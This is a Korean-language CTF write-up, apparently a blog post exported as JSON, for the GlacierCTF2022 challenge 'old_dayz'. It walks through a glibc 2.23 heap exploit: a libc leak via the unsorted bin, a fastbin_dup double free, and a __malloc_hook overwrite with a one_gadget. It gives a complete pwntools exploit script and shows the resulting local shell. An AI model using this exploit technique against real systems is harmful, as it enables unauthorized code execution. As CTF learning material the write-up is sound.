{"id":3615,"date":"2025-05-14T23:42:06","date_gmt":"2025-05-14T14:42:06","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3615"},"modified":"2025-05-15T23:19:36","modified_gmt":"2025-05-15T14:19:36","slug":"glacierctf2022-old_dayz","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3615","title":{"rendered":"[GlacierCTF2022] old_dayz (fastbin_dup, glibc 2.23)"},"content":{"rendered":"\n

\uc694\uc57d<\/h3>\n\n\n\n

\ud574\ub2f9 \ub0b4\uc6a9\uc740 GLIBC 2.23-0ubuntu11.3 \/ ubuntu 16.04 \ud658\uacbd\uc5d0\uc11c unsorted bin\uc5d0 \ub0a8\uaca8\uc9c4 fd, bk \uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c\ub97c \uad6c\ud558\uace0, fastbin_dup\uc73c\ub85c AAW \uc2e4\uc2b5\uc744 \ud55c \ub0b4\uc6a9\uc774\ub2e4.<\/p>\n\n\n\n

\uc774\ub2f9\uc2dc\ub54c\ub294 tcache\uc640 safe-linking \uae30\ubc95\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\uc558\ub2e4.<\/p>\n\n\n\n

checksec<\/h3>\n\n\n\n
seo@seo-ubuntu1604:~\/study\/old_dayz$ checksec .\/old\n[!] Could not populate PLT: invalid syntax (unicorn.py, line 157)\n[*] '\/home\/seo\/study\/old_dayz\/old'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      No canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    Stripped:   No<\/pre>\n\n\n\n
Analysis<\/h3>\n\n\n\n
1. Leak Libc address<\/h3>\n\n\n\n
'''\n\uc774 \ubc29\ubc95\uc774 \uc791\ub3d9\ud558\ub294 \uc774\uc720\ub294 free chunk\ub97c \ud655\uc778\ud560 \uc218 \uc788\uace0, \nunsorted bin\uc774 \uc774\uc911 \uc5f0\uacb0(doubly linked) \uc21c\ud658 \ub9ac\uc2a4\ud2b8\uc774\uae30 \ub54c\ubb38\uc785\ub2c8\ub2e4. \n\ub530\ub77c\uc11c \uc694\uc18c\uac00 \ud558\ub098\ub9cc \uc788\uc744 \uacbd\uc6b0, \uadf8 \uc694\uc18c\uc758 fd\uc640 bk \ud3ec\uc778\ud130\ub294 \n\ubaa8\ub450 \uba54\uc778 \uc544\ub808\ub098(main arena)\uc5d0 \uc788\ub294 unsorted bin\uc758 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a4\uac8c \ub429\ub2c8\ub2e4.\n'''\n\n#fastbin\uc5d0 \ub4e4\uc5b4\uac10, 64\ube44\ud2b8 \uae30\uc900 \uccad\ud06c \ud06c\uae30 \ubc94\uc704 = 32~128byte(7\uac1c\uc758 bin\ub9cc \uc0ac\uc6a9)\nadd(0, 0x80)    #fast bin, chunk size 0x90\nadd(1, 0x20)    #fast bin, chunk size 0x30\ndelete(0)       #\ucc98\uc74c\uc5d0 malloc(0x80)\ud55c \uccad\ud06c\ub97c free\ud558\uba74 unsorted bin\uc73c\ub85c \ub4e4\uc5b4\uac10.<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk \n0x555555559000      0x0                 0x90                 Freed     0x7ffff7dd1b78    0x7ffff7dd1b78\n0x555555559090      0x90                0x30                 Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x5555555590c0 (size : 0x20f40)\n       last_remainder: 0x0 (size : 0x0)\n            unsortbin: 0x555555559000 (size : 0x90)<\/pre>\n\n\n\n
    \n
  • add(0, 0x80)<\/li>\n<\/ul>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
      \n
    • add(0, 0x80) \u2192 add(1, 0x20)<\/li>\n<\/ul>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
        \n
      • malloc(0x80) \u2192 malloc(0x20)\u2192 delete(0)<\/li>\n\n\n\n
      • \uc5ec\uae30\uc11c fd, bk\uc5d0 \uc801\ud78c\uc8fc\uc18c\ub294 libc_base + 0x3c4b78,<\/li>\n\n\n\n
      • \ud574\uc81c\ub41c notes[0]\uc5d0 fd, bk \uac12\uc774 \ub0a8\uc544\uc788\uc5b4 libc \ubca0\uc774\uc2a4 \uacc4\uc0b0 \uac00\ub2a5.<\/li>\n<\/ul>\n\n\n\n
        \"\"<\/figure>\n\n\n\n
        gdb-peda$ x\/gx 0x00007ffff7dd1b78\n0x7ffff7dd1b78 <main_arena+88>: 0x00005555555590c0\ngdb-peda$ p *(struct malloc_state *)(0x00007ffff7dd1b78-88)\n$2 = {\n  mutex = 0x0,\n  flags = 0x1,\n  fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},\n  top = 0x5555555590c0,\n  last_remainder = 0x0,\n  bins = {0x555555559000, 0x555555559000, 0x7ffff7dd1b88 <main_arena+104>,\n    0x7ffff7dd1b88 <main_arena+104>, 0x7ffff7dd1b98 <main_arena+120>,\n    0x7ffff7dd1b98 <main_arena+120>, 0x7ffff7dd1ba8 <main_arena+136>,\n    0x7ffff7dd1ba8 <main_arena+136>, 0x7ffff7dd1bb8 <main_arena+152>,\n    0x7ffff7dd1bb8 <main_arena+152>, 0x7ffff7dd1bc8 <main_arena+168>,\n    0x7ffff7dd1bc8 <main_arena+168>, 0x7ffff7dd1bd8 <main_arena+184>,\n    0x7ffff7dd1bd8 <main_arena+184>, 0x7ffff7dd1be8 <main_arena+200>,\n    0x7ffff7dd1be8 <main_arena+200>, 0x7ffff7dd1bf8 <main_arena+216>,\n    0x7ffff7dd1bf8 <main_arena+216>, 0x7ffff7dd1c08 <main_arena+232>,\n    0x7ffff7dd1c08 <main_arena+232>, 0x7ffff7dd1c18 <main_arena+248>,\n    0x7ffff7dd1c18 <main_arena+248>, 0x7ffff7dd1c28 <main_arena+264>,\n    0x7ffff7dd1c28 <main_arena+264>, 0x7ffff7dd1c38 <main_arena+280>,\n    0x7ffff7dd1c38 <main_arena+280>, 0x7ffff7dd1c48 <main_arena+296>,\n    0x7ffff7dd1c48 <main_arena+296>, 0x7ffff7dd1c58 <main_arena+312>,\n    0x7ffff7dd1c58 <main_arena+312>, 0x7ffff7dd1c68 <main_arena+328>,\n    0x7ffff7dd1c68 <main_arena+328>, 0x7ffff7dd1c78 <main_arena+344>,\n    0x7ffff7dd1c78 <main_arena+344>, 0x7ffff7dd1c88 <main_arena+360>,\n    0x7ffff7dd1c88 <main_arena+360>, 0x7ffff7dd1c98 <main_arena+376>,\n    0x7ffff7dd1c98 <main_arena+376>, 0x7ffff7dd1ca8 <main_arena+392>,\n    0x7ffff7dd1ca8 <main_arena+392>, 0x7ffff7dd1cb8 <main_arena+408>,\n    0x7ffff7dd1cb8 <main_arena+408>, 0x7ffff7dd1cc8 <main_arena+424>,\n    0x7ffff7dd1cc8 <main_arena+424>, 0x7ffff7dd1cd8 <main_arena+440>,\n    0x7ffff7dd1cd8 <main_arena+440>, 0x7ffff7dd1ce8 <main_arena+456>,\n    0x7ffff7dd1ce8 <main_arena+456>, 0x7ffff7dd1cf8 <main_arena+472>,\n    0x7ffff7dd1cf8 <main_arena+472>, 0x7ffff7dd1d08 <main_arena+488>,\n    0x7ffff7dd1d08 <main_arena+488>, 0x7ffff7dd1d18 <main_arena+504>,\n    0x7ffff7dd1d18 <main_arena+504>, 0x7ffff7dd1d28 <main_arena+520>,\n    0x7ffff7dd1d28 <main_arena+520>, 0x7ffff7dd1d38 <main_arena+536>,\n    0x7ffff7dd1d38 <main_arena+536>, 0x7ffff7dd1d48 <main_arena+552>,\n    0x7ffff7dd1d48 <main_arena+552>, 0x7ffff7dd1d58 <main_arena+568>,\n    0x7ffff7dd1d58 <main_arena+568>, 0x7ffff7dd1d68 <main_arena+584>,\n    0x7ffff7dd1d68 <main_arena+584>, 0x7ffff7dd1d78 <main_arena+600>,\n    0x7ffff7dd1d78 <main_arena+600>, 0x7ffff7dd1d88 <main_arena+616>,\n    0x7ffff7dd1d88 <main_arena+616>, 0x7ffff7dd1d98 <main_arena+632>,\n    0x7ffff7dd1d98 <main_arena+632>, 0x7ffff7dd1da8 <main_arena+648>,\n    0x7ffff7dd1da8 <main_arena+648>, 0x7ffff7dd1db8 <main_arena+664>,\n    0x7ffff7dd1db8 <main_arena+664>, 0x7ffff7dd1dc8 <main_arena+680>,\n    0x7ffff7dd1dc8 <main_arena+680>, 0x7ffff7dd1dd8 <main_arena+696>,\n    0x7ffff7dd1dd8 <main_arena+696>, 0x7ffff7dd1de8 <main_arena+712>,\n    0x7ffff7dd1de8 <main_arena+712>, 0x7ffff7dd1df8 <main_arena+728>,\n    0x7ffff7dd1df8 <main_arena+728>, 0x7ffff7dd1e08 <main_arena+744>,\n    0x7ffff7dd1e08 <main_arena+744>, 0x7ffff7dd1e18 <main_arena+760>,\n    0x7ffff7dd1e18 <main_arena+760>, 0x7ffff7dd1e28 <main_arena+776>,\n    0x7ffff7dd1e28 <main_arena+776>, 0x7ffff7dd1e38 <main_arena+792>,\n    0x7ffff7dd1e38 <main_arena+792>, 0x7ffff7dd1e48 <main_arena+808>,\n    0x7ffff7dd1e48 <main_arena+808>, 0x7ffff7dd1e58 <main_arena+824>,\n    0x7ffff7dd1e58 <main_arena+824>, 0x7ffff7dd1e68 <main_arena+840>,\n    0x7ffff7dd1e68 <main_arena+840>, 0x7ffff7dd1e78 <main_arena+856>,\n    0x7ffff7dd1e78 <main_arena+856>, 0x7ffff7dd1e88 <main_arena+872>,\n    0x7ffff7dd1e88 <main_arena+872>, 0x7ffff7dd1e98 <main_arena+888>,\n    0x7ffff7dd1e98 <main_arena+888>, 0x7ffff7dd1ea8 <main_arena+904>,\n    0x7ffff7dd1ea8 <main_arena+904>, 0x7ffff7dd1eb8 <main_arena+920>,\n    0x7ffff7dd1eb8 <main_arena+920>, 0x7ffff7dd1ec8 <main_arena+936>,\n    0x7ffff7dd1ec8 <main_arena+936>, 0x7ffff7dd1ed8 <main_arena+952>,\n    0x7ffff7dd1ed8 <main_arena+952>, 0x7ffff7dd1ee8 <main_arena+968>,\n    0x7ffff7dd1ee8 <main_arena+968>, 0x7ffff7dd1ef8 <main_arena+984>,\n    0x7ffff7dd1ef8 <main_arena+984>, 0x7ffff7dd1f08 <main_arena+1000>,\n    0x7ffff7dd1f08 <main_arena+1000>, 0x7ffff7dd1f18 <main_arena+1016>,\n    0x7ffff7dd1f18 <main_arena+1016>, 0x7ffff7dd1f28 <main_arena+1032>,\n    0x7ffff7dd1f28 <main_arena+1032>, 0x7ffff7dd1f38 <main_arena+1048>,\n    0x7ffff7dd1f38 <main_arena+1048>, 0x7ffff7dd1f48 <main_arena+1064>,\n    0x7ffff7dd1f48 <main_arena+1064>, 0x7ffff7dd1f58 <main_arena+1080>,\n    0x7ffff7dd1f58 <main_arena+1080>, 0x7ffff7dd1f68 <main_arena+1096>,\n    0x7ffff7dd1f68 <main_arena+1096>, 0x7ffff7dd1f78 <main_arena+1112>,\n    0x7ffff7dd1f78 <main_arena+1112>, 0x7ffff7dd1f88 <main_arena+1128>,\n    0x7ffff7dd1f88 <main_arena+1128>, 0x7ffff7dd1f98 <main_arena+1144>,\n    0x7ffff7dd1f98 <main_arena+1144>, 0x7ffff7dd1fa8 <main_arena+1160>,\n    0x7ffff7dd1fa8 <main_arena+1160>, 0x7ffff7dd1fb8 <main_arena+1176>,\n    0x7ffff7dd1fb8 <main_arena+1176>, 0x7ffff7dd1fc8 <main_arena+1192>,\n    0x7ffff7dd1fc8 <main_arena+1192>, 0x7ffff7dd1fd8 <main_arena+1208>,\n    0x7ffff7dd1fd8 <main_arena+1208>, 0x7ffff7dd1fe8 <main_arena+1224>,\n    0x7ffff7dd1fe8 <main_arena+1224>, 0x7ffff7dd1ff8 <main_arena+1240>,\n    0x7ffff7dd1ff8 <main_arena+1240>, 0x7ffff7dd2008 <main_arena+1256>,\n    0x7ffff7dd2008 <main_arena+1256>, 0x7ffff7dd2018 <main_arena+1272>,\n    0x7ffff7dd2018 <main_arena+1272>, 0x7ffff7dd2028 <main_arena+1288>,\n    0x7ffff7dd2028 <main_arena+1288>, 0x7ffff7dd2038 <main_arena+1304>,\n    0x7ffff7dd2038 <main_arena+1304>, 0x7ffff7dd2048 <main_arena+1320>,\n    0x7ffff7dd2048 <main_arena+1320>, 0x7ffff7dd2058 <main_arena+1336>,\n    0x7ffff7dd2058 <main_arena+1336>, 0x7ffff7dd2068 <main_arena+1352>,\n    0x7ffff7dd2068 <main_arena+1352>, 0x7ffff7dd2078 <main_arena+1368>,\n    0x7ffff7dd2078 <main_arena+1368>, 0x7ffff7dd2088 <main_arena+1384>,\n    0x7ffff7dd2088 <main_arena+1384>, 0x7ffff7dd2098 <main_arena+1400>,\n    0x7ffff7dd2098 <main_arena+1400>, 0x7ffff7dd20a8 <main_arena+1416>,\n    0x7ffff7dd20a8 <main_arena+1416>, 0x7ffff7dd20b8 <main_arena+1432>,\n    0x7ffff7dd20b8 <main_arena+1432>, 0x7ffff7dd20c8 <main_arena+1448>,\n    0x7ffff7dd20c8 <main_arena+1448>, 0x7ffff7dd20d8 <main_arena+1464>,\n    0x7ffff7dd20d8 <main_arena+1464>, 0x7ffff7dd20e8 <main_arena+1480>,\n    0x7ffff7dd20e8 <main_arena+1480>, 0x7ffff7dd20f8 <main_arena+1496>,\n    0x7ffff7dd20f8 <main_arena+1496>, 0x7ffff7dd2108 <main_arena+1512>,\n    0x7ffff7dd2108 <main_arena+1512>, 0x7ffff7dd2118 <main_arena+1528>,\n    0x7ffff7dd2118 <main_arena+1528>, 0x7ffff7dd2128 <main_arena+1544>,\n    0x7ffff7dd2128 <main_arena+1544>, 0x7ffff7dd2138 <main_arena+1560>,\n    0x7ffff7dd2138 <main_arena+1560>, 0x7ffff7dd2148 <main_arena+1576>,\n    0x7ffff7dd2148 <main_arena+1576>, 0x7ffff7dd2158 <main_arena+1592>,\n    0x7ffff7dd2158 <main_arena+1592>, 0x7ffff7dd2168 <main_arena+1608>,\n    0x7ffff7dd2168 <main_arena+1608>, 0x7ffff7dd2178 <main_arena+1624>,\n    0x7ffff7dd2178 <main_arena+1624>, 0x7ffff7dd2188 <main_arena+1640>,\n    0x7ffff7dd2188 <main_arena+1640>, 0x7ffff7dd2198 <main_arena+1656>,\n    0x7ffff7dd2198 <main_arena+1656>, 0x7ffff7dd21a8 <main_arena+1672>,\n    0x7ffff7dd21a8 <main_arena+1672>...},\n  binmap = {0x0, 0x0, 0x0, 0x0},\n  next = 0x7ffff7dd1b20 <main_arena>,\n  next_free = 0x0,\n  attached_threads = 0x1,\n  system_mem = 0x21000,\n  max_system_mem = 0x21000\n}\ngdb-peda$<\/pre>\n\n\n\n
          \n
        • \ucd5c\uc885 \ucf54\ub4dc<\/li>\n<\/ul>\n\n\n\n
          #fastbin\uc5d0 \ub4e4\uc5b4\uac10, 64\ube44\ud2b8 \uae30\uc900 \uccad\ud06c \ud06c\uae30 \ubc94\uc704 = 32~128byte(7\uac1c\uc758 bin\ub9cc \uc0ac\uc6a9)\nadd(0, 0x80)    #fast bin, chunk size 0x90\nadd(1, 0x20)    #fast bin, chunk size 0x30\ndelete(0)       #\ucc98\uc74c\uc5d0 malloc(0x80)\ud55c \uccad\ud06c\ub97c free\ud558\uba74 unsorted bin\uc73c\ub85c \ub4e4\uc5b4\uac10.\n\nleak = view(0)\nleak = leak[:6]\nleak = uu64(leak)\ninfo(\"leaked: \" + hex(leak))\nl.address = leak - 0x3c4b78\ninfo(\"libc base: \" + hex(l.address))<\/pre>\n\n\n\n
          2. AAW using fastbin_dup technique<\/h3>\n\n\n\n
          unsorted bin\uc73c\ub85c\ubd80\ud130 \ub2e4\uc2dc fastbin\uc73c\ub85c\ubd80\ud130 \ud560\ub2f9\ubc1b\uace0, \ub098\uba38\uc9c0 2\uac1c\ub3c4 fastbin\uc73c\ub85c \ud560\ub2f9.<\/p>\n\n\n\n
          add(2, 0x80) # \uc624\ub798\ub41c \uccad\ud06c, notes[2]\ub85c \ud560\ub2f9\ud568.. unsorted bin\uc5d0\uc11c \uc694\uccad\ub418\uc5c8\uae30 \ub54c\ubb38\uc5d0, \ub2e4\uc74c malloc\uc5d0\uc11c\ub294 \uc774 \uccad\ud06c\ub97c \ubc1b\uc744 \uc218 \uc5c6\uc74c.\nadd(3, 0x68) # A idx 3\nadd(4, 0x68) # B idx 4<\/pre>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
            \n
          • fastbin dup \/ Double-free \ubc84\uadf8 \ud2b8\ub9ac\uac70<\/li>\n<\/ul>\n\n\n\n
            #fastbin dup \ud2b8\ub9ac\uac70\ndelete(3) # A idx 3 : A linked into fastbin\ndelete(4) # B idx 4 : B linked into fastbin\ndelete(3) # A idx 3 : A linked into fastbin again<\/pre>\n\n\n\n
            \"\"<\/figure>\n\n\n\n
              \n
            • \uc774\uc81c \ud560\ub2f9\uc2dc notes[5]\uc640 notes[7]\uc740 \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0b4.<\/li>\n\n\n\n
            • notes[7] \ud560\ub2f9\ud558\uae30 \uc804\uc5d0, notes[5]\uc5d0 malloc_hook-35 8\ubc14\uc774\ud2b8\ub97c \uc791\uc131\ud574 AAW\ud560 \ub300\uc0c1 \uc8fc\uc18c \uacb0\uc815. \uc774\ub294 \ucd94\ud6c4, notes[8]\uc5d0\uc11c \ud560\ub2f9\ubc1b\uc744\ub54c, write \ud568\uc218\ub85c AAW\ud560 \uc218 \uc788\uc74c.<\/li>\n<\/ul>\n\n\n\n
              # \uc774\uc81c 1\ubc88\uc9f8 \ud560\ub2f9 \uc8fc\uc18c\uc640 3\ubc88\uc9f8 \ud560\ub2f9 \uc8fc\uc18c\ub294 \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0b4.\nadd(5, 0x68) # 5                                        #0x00005555555590d0\nwrite(5, p64(malloc_hook-35))   \nadd(6, 0x68) # 6                                        #0x0000555555559140\nadd(7, 0x68) # 7 malloc_hook-35\ub97c 0x70 fastbin\uc5d0 \ub123\uc74c.   #0x00005555555590d0<\/pre>\n\n\n\n
              \"\"<\/figure>\n\n\n\n
                \n
              • \uc774\uc81c add(8, 0x68)<\/code><\/strong> \ud638\ucd9c\uc2dc, notes[8]\uc5d0 \ud560\ub2f9\ubc1b\uc740 \uc8fc\uc18c\ub294 AAW\ud560 \ub300\uc0c1\uc8fc\uc18c\uac00 \uc801\ud600\uc788\uc74c.<\/li>\n\n\n\n
              • \uc801\ud78c 0x00007ffff7dd1afd<\/code><\/strong> \uc8fc\uc18c\ub294 libc base + 0x3c4afd<\/code><\/strong><\/li>\n<\/ul>\n\n\n\n
                gdb-peda$ x\/16gx 0x0005555555580C0\n0x5555555580c0 <notes>: 0x0000555555559010      0x00005555555590a0\n0x5555555580d0 <notes+16>:      0x0000555555559010      0x00005555555590d0\n0x5555555580e0 <notes+32>:      0x0000555555559140      0x00005555555590d0\n0x5555555580f0 <notes+48>:      0x0000555555559140      0x00005555555590d0\n0x555555558100 <notes+64>:      0x00007ffff7dd1afd      0x0000000000000000\n0x555555558110 <notes+80>:      0x0000000000000000      0x0000000000000000\n0x555555558120 <notes+96>:      0x0000000000000000      0x0000000000000000\n0x555555558130 <notes+112>:     0x0000000000000000      0x0000000000000000<\/pre>\n\n\n\n
                .data:00000000003C4AF0                 dq offset _IO_wfile_jumps\n.data:00000000003C4AF8                 db    0\n.data:00000000003C4AF9                 db    0\n.data:00000000003C4AFA                 db    0\n.data:00000000003C4AFB                 db    0\n.data:00000000003C4AFC                 db    0\n.data:00000000003C4AFD                 db    0\n.data:00000000003C4AFE                 db    0\n.data:00000000003C4AFF                 db    0\n.data:00000000003C4B00                 public __memalign_hook ; weak\n.data:00000000003C4B00 __memalign_hook dq offset sub_85EA0     ; DATA XREF: LOAD:0000000000010DD0\u2191o\n.data:00000000003C4B00                                         ; .got:__memalign_hook_ptr\u2191o\n.data:00000000003C4B08                 public __realloc_hook ; weak\n.data:00000000003C4B08 __realloc_hook  dq offset sub_85A70     ; DATA XREF: LOAD:000000000000C888\u2191o\n.data:00000000003C4B08                                         ; .got:__realloc_hook_ptr\u2191o\n.data:00000000003C4B10                 public __malloc_hook ; weak\n.data:00000000003C4B10 __malloc_hook   dq offset sub_858A0     ; DATA XREF: LOAD:000000000000A380\u2191o\n.data:00000000003C4B10                                         ; .got:__malloc_hook_ptr\u2191o\n.data:00000000003C4B18                 align 20h\n.data:00000000003C4B20 dword_3C4B20    dd 0                    ; DATA XREF: sub_7D920:loc_7DB9E\u2191o\n.data:00000000003C4B20                                         ; sub_7D920+341\u2191o ...\n.data:00000000003C4B24 dword_3C4B24    dd 0                    ; DATA XREF: sub_7DEC0:loc_7DEFE\u2191r\n.data:00000000003C4B24                                         ; sub_7DFB0:loc_7DFF7\u2191r ...\n.data:00000000003C4B28 unk_3C4B28      db    0                 ; DATA XREF: malloc_set_state:loc_86201\u2191o<\/pre>\n\n\n\n
                  \n
                • \uc801\ud78c<\/strong> 0x00007ffff7dd1afd<\/code> \uc8fc\uc18c\ub294 libc base + 0x3c4afd<\/code> \uc774\ubbc0\ub85c, 0x3C4B10 – 0x3c4afd = 0x13\ub9cc\ud07c \ub354\ubbf8\ub85c \ucc44\uc6cc\uc57c 8\ubc14\uc774\ud2b8 malloc_hook \ud3ec\uc778\ud130 \uc8fc\uc18c\ub97c \ub36e\uc5b4\uc4f8 \uc218 \uc788\uc74c.<\/li>\n\n\n\n
                • 8\ubc14\uc774\ud2b8 malloc_hook\uc740 one_gadget \uc8fc\uc18c\ub85c \ub36e\uc5b4\uc4f0\uae30!<\/li>\n\n\n\n
                • \uc774\ud6c4\uc5d0\ub294 \ub2e4\uc74c\ubc88\uc5d0 malloc \ud638\ucd9c\uc2dc, \uc6d0\uac00\uc82f\uc774 \uc2e4\ud589\ub428.<\/li>\n<\/ul>\n\n\n\n
                  add(8, 0x68) # 8 malloc_hook-35\ubd80\ud130 \uc2dc\uc791\ud558\uc5ec 0x70 \ud06c\uae30\uc758 \uccad\ud06c\ub97c \uc694\uccad.\n#  0x13\ub9cc\ud07c \ub354\ubbf8\ub85c \ucc44\uc6cc\uc57c 8\ubc14\uc774\ud2b8 malloc_hook \ud3ec\uc778\ud130 \uc8fc\uc18c\ub97c \ub36e\uc5b4\uc4f8 \uc218 \uc788\uc74c\nwrite(8, b\"A\"*19 + p64(one_gadget)) #\uc6d0\uac00\uc82f\uc73c\ub85c \ub36e\uc5b4\uc500.\u3147\u3147\u3147\n\nadd(9, 0x68)    #\uc6d0\uac00\uc82f \uc2e4\ud589<\/pre>\n\n\n\n
                  solve.py<\/h3>\n\n\n\n
                  from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/old\")\ne = ELF('.\/old',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\ndef add(idx, size):\n    sla(b\"> \", b\"1\")\n    sla(b\"idx: \\n\", str(idx))\n    sla(b\"size: \\n\", str(size))\n\ndef delete(idx):\n    sla(b\"> \", b\"2\")\n    sla(b\"idx: \\n\", str(idx))\n\ndef write(idx, contents):\n    sla(b\"> \", b\"3\")\n    sla(b\"idx: \\n\", str(idx))\n    sla(b\"contents: \\n\", (contents))\n\ndef view(idx):\n    sla(b\"> \", b\"4\")\n    sla(b\"idx: \\n\", str(idx))\n    result = p.recvline()\n    # info(result)\n    result = result.split(b\"data: \")[1]\n    return result\n\ndef exit():\n    sla(b\"> \", b\"5\")\n\ndef exit_42():\n    sla(b\"> \", b\"5\")\n\n'''\n\uc774 \ubc29\ubc95\uc774 \uc791\ub3d9\ud558\ub294 \uc774\uc720\ub294 free chunk\ub97c \ud655\uc778\ud560 \uc218 \uc788\uace0, \nunsorted bin\uc774 \uc774\uc911 \uc5f0\uacb0(doubly linked) \uc21c\ud658 \ub9ac\uc2a4\ud2b8\uc774\uae30 \ub54c\ubb38\uc785\ub2c8\ub2e4. \n\ub530\ub77c\uc11c \uc694\uc18c\uac00 \ud558\ub098\ub9cc \uc788\uc744 \uacbd\uc6b0, \uadf8 \uc694\uc18c\uc758 fd\uc640 bk \ud3ec\uc778\ud130\ub294 \n\ubaa8\ub450 \uba54\uc778 \uc544\ub808\ub098(main arena)\uc5d0 \uc788\ub294 unsorted bin\uc758 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a4\uac8c \ub429\ub2c8\ub2e4.\n'''\n#Leak libc \n#fastbin\uc5d0 \ub4e4\uc5b4\uac10, 64\ube44\ud2b8 \uae30\uc900 \uccad\ud06c \ud06c\uae30 \ubc94\uc704 = 32~128byte(7\uac1c\uc758 bin\ub9cc \uc0ac\uc6a9)\nadd(0, 0x80)    #fast bin, chunk size 0x90\nadd(1, 0x20)    #fast bin, chunk size 0x30\ndelete(0)       #\ucc98\uc74c\uc5d0 malloc(0x80)\ud55c \uccad\ud06c\ub97c free\ud558\uba74 unsorted bin\uc73c\ub85c \ub4e4\uc5b4\uac10.\n\nleak = view(0)\nleak = leak[:6]\nleak = uu64(leak)\ninfo(\"leaked: \" + hex(leak))\nl.address = leak - 0x3c4b78\ninfo(\"libc base: \" + hex(l.address))\n\n#Overwriting malloc hook: fastbin dup technique\n\nmalloc_hook = l.sym.__malloc_hook\ninfo(\"malloc_hook: \" + hex(malloc_hook))\none_gadget = l.address + 0x4527a\n\nadd(2, 0x80) # \uc624\ub798\ub41c \uccad\ud06c, notes[2]\ub85c \ud560\ub2f9\ud568.. unsorted bin\uc5d0\uc11c \uc694\uccad\ub418\uc5c8\uae30 \ub54c\ubb38\uc5d0, \ub2e4\uc74c malloc\uc5d0\uc11c\ub294 \uc774 \uccad\ud06c\ub97c \ubc1b\uc744 \uc218 \uc5c6\uc74c.\nadd(3, 0x68) # A idx 3\nadd(4, 0x68) # B idx 4\n# ip()\n\n#fastbin dup \ud2b8\ub9ac\uac70\ndelete(3) # A idx 3 : A linked into fastbin\ndelete(4) # B idx 4 : B linked into fastbin\ndelete(3) # A idx 3 : A linked into fastbin again\n# ip()\n\n# \uc774\uc81c 1\ubc88\uc9f8 \ud560\ub2f9 \uc8fc\uc18c\uc640 3\ubc88\uc9f8 \ud560\ub2f9 \uc8fc\uc18c\ub294 \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0b4.\nadd(5, 0x68) # 5                                        #0x00005555555590d0\nwrite(5, p64(malloc_hook-35))   \nadd(6, 0x68) # 6                                        #0x0000555555559140\nadd(7, 0x68) # 7 malloc_hook-35\ub97c 0x70 fastbin\uc5d0 \ub123\uc74c.   #0x00005555555590d0\n\nadd(8, 0x68) # 8 malloc_hook-35\ubd80\ud130 \uc2dc\uc791\ud558\uc5ec 0x70 \ud06c\uae30\uc758 \uccad\ud06c\ub97c \uc694\uccad.\n#  0x13\ub9cc\ud07c \ub354\ubbf8\ub85c \ucc44\uc6cc\uc57c 8\ubc14\uc774\ud2b8 malloc_hook \ud3ec\uc778\ud130 \uc8fc\uc18c\ub97c \ub36e\uc5b4\uc4f8 \uc218 \uc788\uc74c\nwrite(8, b\"A\"*19 + p64(one_gadget)) #\uc6d0\uac00\uc82f\uc73c\ub85c \ub36e\uc5b4\uc500.\u3147\u3147\u3147\n\nadd(9, 0x68)    #\uc6d0\uac00\uc82f \uc2e4\ud589\n\npi()<\/pre>\n\n\n\n
                  Result<\/h3>\n\n\n\n
                  seo@seo-ubuntu1604:~\/study\/old_dayz$ python3 solve.py\n[+] Starting local process '.\/old': pid 3430\n[!] Could not populate PLT: invalid syntax (unicorn.py, line 157)\n[!] Could not populate PLT: invalid syntax (unicorn.py, line 157)\n[*] leaked: 0x7ffff7dd1b78\n[*] libc base: 0x7ffff7a0d000\n[*] malloc_hook: 0x7ffff7dd1b10\n[*] Switching to interactive mode\n$ id\nuid=1000(seo) gid=1000(seo) groups=1000(seo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\n$ whoami\nseo\n$\n[*] Interrupted\n[*] Stopped process '.\/old' (pid 3430)<\/pre>\n","protected":false},"excerpt":{"rendered":"
